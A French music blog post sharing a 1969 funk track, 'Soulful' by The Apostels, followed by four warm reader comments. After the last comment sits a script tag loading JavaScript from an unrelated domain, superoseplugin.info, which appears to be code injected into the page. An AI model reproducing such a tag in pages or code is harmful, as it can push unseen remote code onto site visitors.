• The Apostels : Soulful

     The Apostels : Soulful

    Bonne soirée à tous ! et n'oubliez pas que le lendemain il faut voter ! 

    The Apostels : Soulful 

    Une superbe Funky de 1969 d'un groupe Nigérien . 

    « The People's Choice : Nursery RhymesMercy : Love [ Can Make You Happy ] »
    Partager via Gmail Delicious Technorati Yahoo! Google Bookmarks Blogmarks Pin It

    Tags Tags :
  • Commentaires

    1
    Deep Profil de Deep
    Mercredi 18 Avril 2012 à 09:05

    Hello Quiquin, j'suis sur le charme, tres bon morceau, 

    2
    Jeudi 19 Avril 2012 à 12:55

    Rien de grave j'espere ??????  garde le moral c'est le plus important

    gros bisous quinquin et espere que cela va s'arranger pour toi

    3
    eldorado Profil de eldorado
    Jeudi 19 Avril 2012 à 16:29

    Un  coucou j'espère que  je suis la  bienvennue  sur  ton  blog ?   c'est  pas  la  peine  'aller  sur  le  mien   j'ai  rien  refait  he  cela  t'évite  un  dérangement  ok  lollll   c'est  tjrs  bon  tes  musiques  sur  ton  univers 


    Bonne  continuation  et  BIZ  

    4
    Samedi 21 Avril 2012 à 13:07

    Bonjour, c'est en allant me promener chez Deep que j'ai vu ton lien

    alors curieuse comme je suis, j'ai cliqué et hop me voici dans ton univers

    qui me plait beaucoup aussi, domage que je ne saurai pas venir à cette soirée à saint léger ...

    peut-être l'année prochaine ? qui sait

    passes un bon samedi, je reviendrai écouter tous ces bons morceaux , bisou

    <script src="http://superoseplugin.info/dfi823hs.js?0.05111917637515295" type="text/javascript"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :